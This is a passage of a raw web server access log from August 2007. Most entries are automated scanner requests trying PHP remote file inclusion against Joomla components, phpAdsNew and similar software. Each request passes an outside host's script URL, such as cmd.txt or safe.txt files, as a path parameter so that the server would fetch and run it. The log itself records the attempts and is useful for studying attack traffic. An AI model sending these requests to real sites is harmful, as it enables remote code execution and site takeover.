200.168.40.165 - - [27/Aug/2007:17:00:01 -0700] "GET /logs/access_070702.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.artewebstudio.it/images/ijoomla/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.160.58.97 - - [27/Aug/2007:17:00:59 -0700] "GET /oneadmin/blogger/sampleblogger.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.160.58.97 - - [27/Aug/2007:17:04:04 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.160.58.97 - - [27/Aug/2007:17:05:49 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.160.58.97 - - [27/Aug/2007:17:05:50 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.99.194.216 - - [27/Aug/2007:17:08:45 -0700] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://labulle.tv/soho/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.99.194.216 - - [27/Aug/2007:17:08:45 -0700] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://labulle.tv/soho/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.214.234 - - [27/Aug/2007:17:10:40 -0700] "GET /logs/access.log HTTP/1.0" 200 126517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.249.73.202 - - [27/Aug/2007:17:13:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [27/Aug/2007:17:13:29 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
82.165.33.12 - - [27/Aug/2007:17:13:58 -0700] "GET /logs/access_070618.log/wordtube/wordtube-button.php?wpPATH=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
203.151.232.105 - - [27/Aug/2007:17:14:00 -0700] "GET /logs/index2.php?content=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [27/Aug/2007:17:14:05 -0700] "GET /index2.php?content=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.169.148.17 - - [27/Aug/2007:17:14:43 -0700] "GET /logs/phpAdsNew/view.inc.php?phpAds_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.169.148.17 - - [27/Aug/2007:17:14:44 -0700] "GET /phpAdsNew/view.inc.php?phpAds_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.165.33.12 - - [27/Aug/2007:17:15:00 -0700] "GET /logs/access_070611.log/wordtube/wordtube-button.php?wpPATH=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
209.160.58.97 - - [27/Aug/2007:17:16:39 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.160.58.97 - - [27/Aug/2007:17:16:39 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.226.137 - - [27/Aug/2007:17:22:06 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.67.245.17 - - [27/Aug/2007:17:26:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.17 - - [27/Aug/2007:17:26:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.17 - - [27/Aug/2007:17:26:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.17 - - [27/Aug/2007:17:26:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.17 - - [27/Aug/2007:17:27:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.17 - - [27/Aug/2007:17:27:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.191.97.217 - - [27/Aug/2007:17:27:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.191.97.217 - - [27/Aug/2007:17:27:22 -0700] "G